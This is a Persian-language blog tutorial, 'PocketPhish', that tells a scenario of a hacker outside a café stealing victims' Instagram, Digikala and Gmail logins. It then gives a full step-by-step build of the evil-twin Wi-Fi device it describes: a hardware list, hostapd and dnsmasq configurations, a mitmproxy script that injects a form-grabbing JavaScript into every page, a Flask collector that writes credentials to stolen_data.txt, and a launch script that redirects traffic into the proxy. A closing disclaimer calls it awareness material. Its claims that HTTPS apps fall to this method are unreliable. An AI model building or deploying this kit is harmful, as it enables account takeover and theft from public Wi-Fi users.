PocketPhish

Mestercomuter Mestercomuter Mestercomuter · 2 اردیبهشت · خواندن 10 دقیقه

خیلی دوست داشتم بشه اینو بعد ساخت فروخت اما هرچی فکر کردم دیدم جنبه منفی خیلی داره و خطرناک و .... پس تصمیم گرفتم اموزششو بزارم در دسترس عموم که خیلی ها به خیلی از این قطعات دسترسی ندارند مگر افراد خاص 

بزار بگیم داخل یک سناریو دقیقا چیه این کاره ما این ساخت یک سخت افزار هک هست همیشه کد نمی‌زنیم که : 

هکر یک هفته قبل از عملیات اصلی، چند بار به عنوان مشتری به کافی شاپ می‌رود و اطلاعات زیر را جمع می‌کند:

SSID شبکه وای‌فای: Cafe_VIP

· نوع رمزنگاری: WPA2-PSK

· رمز شبکه: Cafe@North2024 (حدس می‌زند یا از روی برچسب روتر که در دید مشتریان است)

· ساعات شلوغی: 4 تا 8 عصر (بیشترین تعداد مشتری)

· نوع فعالیت کاربران: خرید اینترنتی، چک کردن ایمیل، ورود به شبکه‌های اجتماعی ، کارت به کارت .

یک هفته بعد هم 

 

1. هکر داخل یک خودرو پارک شده در ۵۰ متری کافی شاپ می‌نشیند.

2. دستگاه خودشو  روشن و به پاوربانک متصل می‌کند.

3. اسکریپت launch.sh را اجرا می‌کند.

4. دستگاه شروع به پخش یک اکسس پوینت جعلی با مشخصات کاملاً مشابه شبکه کافی شاپ می‌کند:

      SSID: Cafe_VIP | Encryption: WPA2 | Password: Cafe@North2024

5. هکر با لپ‌تاپ خود به دستگاه متصل می‌شود و کنسول bettercap را باز می‌کند تا وضعیت قربانیان را مانیتور کند.

[10:15:23] [wifi.client.new] ‎new client XX:XX:XX:XX:XX:XX (Samsung-Galaxy-S22) associated to SSID Cafe_VIP

[10:15:25] [wifi.client.new] ‎new client YY:YY:YY:YY:YY:YY (iPhone-14-Pro) associated to SSID Cafe_VIP

[10:15:30] [wifi.client.new] ‎new client ZZ:ZZ:ZZ:ZZ:ZZ:ZZ (Google-Pixel-7) associated to SSID Cafe_VIP

 

قربانی شماره ۱ (صاحب یک حساب اینستاگرام با ۵۰ هزار فالوور):

· قربانی اینستاگرام را باز می‌کند.

· دستگاه هکر صفحه لاگین اینستاگرام را با اسکریپت جاسوسی تزریق شده به او نشان می‌دهد.

· قربانی نام کاربری و رمز خود را وارد می‌کند.

· هکر روی لپ‌تاپ خود می‌بیند:

[CAPTURED] instagram.com: username: armita_76 | password: mySecurePass123

هکر بلافاصله با همان رمز از طریق لپ‌تاپ خود وارد اکانت اینستاگرام قربانی می‌شود، ایمیل و شماره تلفن اکانت را تغییر می‌دهد و کنترل کامل را به دست می‌گیرد.

قربانی شماره ۲ (یک تاجر که قصد خرید آنلاین دارد):

· قربانی وارد سایت دیجی کالا می‌شود.

· هکر صفحه لاگین جعلی را نشان می‌دهد.

· قربانی رمز عبور خود را وارد می‌کند.

· هکر رمز را می‌بیند و بعداً با ورود به حساب کاربری قربانی، آدرس و شماره کارت ذخیره شده را می‌دزدد.

قربانی شماره ۳ (کارمند یک شرکت فناوری):

· قربانی ایمیل کاری خود (Gmail) را چک می‌کند.

· هکر صفحه لاگین جعلی جیمیل را نشان می‌دهد.

· قربانی رمز خود را وارد می‌کند. هکر رمز را می‌گیرد و بعداً به اسناد محرمانه شرکت دسترسی پیدا می‌کند.

چند ساعت بعد 

کافی شاپ خلوت می‌شود. هکر:

1. اسکریپت را با Ctrl+C متوقف می‌کند.

2. دستگاه را خاموش می‌کند.

3. از محل دور می‌شود.

هیچ گواهی جعلی روی گوشی قربانیان نصب نشده است.

· هیچ نرم‌افزاری روی گوشی آنها نبوده که متوجه شوند.

· روتر اصلی کافی شاپ هم هیچ ورودی لاگ عجیبی ندارد چون حمله روی دستگاه جداگانه انجام شده.

· تنها مدرک، فایل stolen_data.txt روی حافظه هکر. 

خوب حالا بریم سخت افزار رو برسی کنیم بیا آدمه مطلب 

 

$>_
☕ حمایت از MR.COMPUTER
اگر مطلب مفید بود • دونیت اختیاری
> coffeebede.com TOR

یه دستگاه می‌سازیم که هر وای‌فایی رو جعل کنه همون چیزی که هکر داستان مون داشت

سلام !

خب، اون ماجرایی که گفتم و اون دستگاه عجیبی که هکر درست کرده بود... راستش من کلی فکر کردم و خلاصه، این آموزش رو می‌نویسم که تو هم بتونی یکی مثل دستگاهی که هکرمون داشت، بسازی. فقط قبل از هر چیزی، یه قول بده: کثافت کاری نکنی ، آفرین.

حالا بریم سراغش...

اول: چه چیزهایی باید بخری؟

بیا صادق باشیم، این دستگاه رو نمی‌تونی با ۲ ملیون  بسازی. ولی خیلی هم گرون نیست. این لیست رو ببین:

· مغز دستگاه: Raspberry Pi 4 یا 5 (حداقل ۴ گیگ رم). ۵۰ تا ۸۰ دلار. هرچی رم بیشتر باشه، بهتر می‌تونه چند نفر رو همزمان فریب بده.
· کارت وای فای خارجی: Alfa AWUS036ACH یا هر کارتی که تراشه‌اش Realtek RTL8812AU باشه. ۳۵ تا ۴۵ دلار. کارت داخلی رزبری خودش به تنهایی نمی‌تونه این کار رو درست انجام بده، این کارت جانبی حتماً لازمه.
· باتری: یه پاوربانک ۱۰ هزار میلی آمپری که بتونه ۵ ولت و ۳ آمپر بده (USB-C باشه بهتره). ۲۰ تا ۳۰ دلار. باید بتونه حداقل ۴-۵ ساعت دستگاه رو روشن نگه داره.
· خنک کننده: هیت سینک + یه فن ۵ ولتی. ۱۰ تا ۱۵ دلار. باور کن رزبری بدون فن خیلی زود داغ می‌کنه و خاموش می‌شه. مخصوصاً وقتی داره چند نفر رو همزمان می‌کشونه.
· حافظه: یه میکرو اس دی ۳۲ گیگی (کلاس 10). حدود ۱۰ دلار. سیستم عامل روش نصب می‌شه.
· یه جعبه (اختیاری): ۵ تا ۱۰ دلار. می‌تونی همه چیز رو داخلش جمع و جور کنی که قشنگ بشه.

جمع کل: حدود ۱۳۰ تا ۱۹۰ دلار. اگر از علی‌اکسپرس بخری، ارزون‌تر هم می‌شه.

اینارو به دلار حدودی گفتم شاید. عوض شده باشه یا هرچی چون خیلی ها از بازار سیاه باید تهیه کنن و نمی‌دونم رزبی پای ۴ یا ۵ چنده تو ایران الان ولی قطعا بری عراق بخری خیلی ارزون تر در میاد 

دوم: چه نرم‌افزارهایی لازمه؟

· سیستم عامل: Raspberry Pi OS Lite (نسخه‌ی بدون دسکتاپ، چون قرار نیست بهش مانیتور بزنی).
· ابزارهای اصلی: hostapd (برای ساختن شبکه جعلی)، dnsmasq (برای جعل DNS)، bettercap (برای مدیریت حمله)، mitmproxy (برای پل زدن و دزدکی کردن).
· زبان برنامه نویسی: Python 3 به همراه Flask (برای نوشتن سرور دزدکی).

گام اول: سیستم عامل رو روی رزبری نصب کن

خیلی راحته. نرم‌افزار Raspberry Pi Imager رو از سایتش دانلود کن و نصبش کن. بعد:

1. کارت میکرو اس دی رو به لپ‌تاپت بزن.
2. نرم‌افزار رو باز کن:
  · Choose Device: Raspberry Pi 4 (یا 5، هر چی داری).
  · Choose OS: Raspberry Pi OS Lite (64-bit).
  · Choose Storage: کارت ۳۲ گیگیت رو انتخاب کن.
3. دکمه Next رو بزن. بعد روی Edit Settings کلیک کن:
  · یه اسم برای دستگاهت بذار (مثلاً mitm-box).
  · یه username و password بذار (همون pi و raspberry).
  · تیک Enable SSH رو بزن.
  · Wi-Fi رو خاموش کن (چون قرار نیست به شبکه خونه وصل بشه، خودش شبکه میده).
4. ذخیره کن و صبر کن تا نوشته بشه.

گام دوم: رزبری رو روشن کن و باهاش حرف بزن

1. کارت رو بذار توی رزبری.
2. کارت وای فای خارجی رو به یکی از پورت‌های USB رزبری وصل کن.
3. رزبری رو با کابل USB به پاوربانک وصل کن. صبر کن یه ۲ دقیقه‌ای تا بالا بیاد.
4. از روی لپ‌تاپ یا گوشیت (با اپلیکیشن JuiceSSH) بهش وصل شو:

```bash
ssh pi@raspberrypi.local
```

رمز رو که raspberry هست، وارد کن.

گام سوم: ابزارها رو نصب کن

یه کم صبر کن تا آپدیت بشه:

```bash
sudo apt update && sudo apt upgrade -y
sudo apt install hostapd dnsmasq bettercap python3-pip -y
pip3 install mitmproxy flask
```

گام چهارم: شبکه جعلی رو بساز

حالا وقتشه که به رزبری بگی چه جور شبکه‌ای پخش کنه. یه فایل کانفیگ درست کن:

```bash
sudo nano /etc/hostapd/hostapd.conf
```

و این رو توش کپی کن (اسم شبکه و رمز رو هر چی دوست داری عوض کن):

```ini
interface=wlan1
driver=nl80211
ssid=WiFi_Free_For_All
hw_mode=g
channel=6
wmm_enabled=1
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=12345678
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
```

بعد Ctrl+O و Ctrl+X رو بزن تا ذخیره بشه.

گام پنجم: DNS جعلی رو راه بنداز

حالا نوبت dnsmasq هست که به دستگاه بگه هر کسی به این شبکه وصل شد، دی‌ان‌اسش رو بفرسته سمت خودش.

```bash
sudo nano /etc/dnsmasq.conf
```

و این رو توش کپی کن:

```ini
interface=wlan1
dhcp-range=192.168.100.2,192.168.100.200,255.255.255.0,24h
dhcp-option=3,192.168.100.1
dhcp-option=6,192.168.100.1
server=8.8.8.8
log-queries
```

گام ششم: اسکریپت جاسوسی رو بنویس

حالا می‌رسیم به جادوی اصلی. یه فایل به اسم injector.py درست کن:

```bash
nano injector.py
```

و این کد پایتون رو توش کپی کن:

```python
from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
   if "text/html" in flow.response.headers.get("content-type", ""):
       inject_script = """
       <script>
       document.addEventListener('submit', function(e) {
           var form = e.target;
           var formData = new FormData(form);
           var data = {};
           formData.forEach((v,k) => data[k]=v);
           fetch('http://192.168.100.1:8080/steal', {
               method: 'POST',
               body: JSON.stringify(data),
               headers: {'Content-Type': 'application/json'}
           });
       });
       </script>
       """
       flow.response.text = flow.response.text.replace("</body>", inject_script + "</body>")
       print(f"[+] یه فرم توی {flow.request.pretty_url} پیدا کردم و جاسوسش کردم!")
```

این کد یعنی هر صفحه‌ای که قربانی می‌بینه، یه چشم مخفی توش می‌ذاره که هر چی توی فرم‌ها تایپ کرد، یه کپی ازش بفرسته سمت دستگاه تو.

گام هفتم: سرور جمع‌کننده اطلاعات رو بساز

حالا یه سرور ساده می‌سازیم که اطلاعات دزدیده شده رو ذخیره کنه. فایل server.py رو بساز:

```bash
nano server.py
```

و این کد رو توش بذار:

```python
from flask import Flask, request
app = Flask(__name__)

@app.route('/steal', methods=['POST'])
def steal():
   data = request.get_json()
   with open("stolen_data.txt", "a") as f:
       f.write(str(data) + "\n")
   print(f"[!] هوووو! اینم از اطلاعات دزدیده شده: {data}")
   return "OK"

if __name__ == '__main__':
   app.run(host='0.0.0.0', port=8080)
```

گام هشتم: یه دکمه برای روشن کردن همه چیز (اسکریپت یکپارچه)

حالا که همه چی رو آماده کردی، بیا یه فایل به اسم launch.sh بساز که با زدن یه دکمه، همه چیز رو یه جا راه بندازه:

```bash
nano launch.sh
```

و این رو توش کپی کن:

```bash
#!/bin/bash
echo "[+] دارم اینترفیس وای‌فای رو روشن می‌کنم..."
sudo ip link set wlan1 up
sudo ip addr add 192.168.100.1/24 dev wlan1

echo "[+] شبکه جعلی رو پخش می‌کنم..."
sudo hostapd /etc/hostapd/hostapd.conf -B

echo "[+] دی‌ان‌اس جعلی رو روشن می‌کنم..."
sudo dnsmasq -C /etc/dnsmasq.conf -d &

echo "[+] مسیریاب رو قاطی می‌کنم تا همه به پروکسی من برن..."
sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 443 -j REDIRECT --to-port 8080

echo "[+] سرور جمع‌کننده اطلاعات رو روشن می‌کنم..."
python3 server.py &

echo "[+] پروکسی مرد میانی رو اجرا می‌کنم..."
mitmproxy -s injector.py --mode transparent --listen-port 8080
```

بعد بهش دستور اجرا بده:

```bash
chmod +x launch.sh
sudo ./launch.sh
```

تبریک می‌گم رفیق! دستگاه تو هم روشن شد. حالا هرکی به شبکه‌ی وای‌فای جعلی تو وصل بشه، تو می‌تونی ببینی چه خبره.

یه عالمه حرف آخر چون اگه دیوار و دیجی کالا رو نگاه کردی تو از ایران هم گیر میاد قطعات دوست داشتم تا آخر بخونی بعد بگم 😂 معذرت 

· این دستگاه هیچ گواهی جعلی روی گوشی قربانی نصب نمی‌کنه. به همین خاطر هیچ خطایی هم نمی‌بینه. همه چی عادیه!
· صفحات رو زنده از سرور واقعی می‌گیره و فقط یه چشم مخفی توش می‌ذاره.
· حتی تلگرام و اینستاگرام که کلی قفل و بست دارن، از این روش جواب می‌دن ! چون اونها گواهی رو چک می‌کنن، ولی وقتی کل صفحه رو عوض می‌کنی... قضیه فرق می‌کنه.

یادت باشه: این دفترچه راهنما رو فقط برای این نوشتم که بفهمی چقدر شبکه‌های وای‌فای عمومی می‌تونن خطرناک باشن. نه اینکه بری وای‌فای کافی شاپ رو جعل کنی و حساب مردم رو خالی کنی. اون کار هم کثافت کاریه، هم مجازات سنگینی توی دادگاه داره.

تتیتیش مامانی بودن رو کنار می‌زارم اما اگه تونستی بسازی چون یک جاهایی رو غلط نوشتم که احل فن برن دنبالش اما اگه ساختید و از این کثافت کاریا بکنید ببینید یک بابایی بود وای فای هک کرده بود گفته بود ما آموزش دادیم 

پلیسم ایمیل زد که آره فلان مایم پاسخ قانونی دادیم که هرکسی مسئول کار خودشه تیغ هم آدم می‌کشه دست آدم کش هم دست جراح یا امداد گر جان آدم هارو نجات میده من بگم چجوری چاقو بگیره دستش چرا قاتل بشه ؟ 

 هک هم همینه ازاین مطلب ها برای دانش فنی و افزایش امنیت خودتون استفاده کنید به هر جایی وصل نشید ضمناً اگه هکر رمز رو هم جعل نکنه با فرایند WiFi kill که نگفتم چون اسم و ssid رو جعل کرده اتوماتیک به وای فای هکر وصل میشه گوشی شما بدون در نظر گرفتن رمز و ... حتی تأیید هم نمی‌خواد نمی‌خواد دستی برید زرت وصلش کنید خودش وصل میشه اگه قبلا به اون وای فای وصل شده باشید . 

برای اطلاعات بیشتر mestercomputer.blogix.ir دنبال کنید پارت بعدی نداریم قهوه بخرین برامون که الان ساعت ۵ صبحه این تموم شده 😂.

 

 

حمایت از MR.COMPUTER
اگر این محتوا برات مفید بود • حمایت کاملاً اختیاری
☕ coffeebede.com/mrcomputer DONATE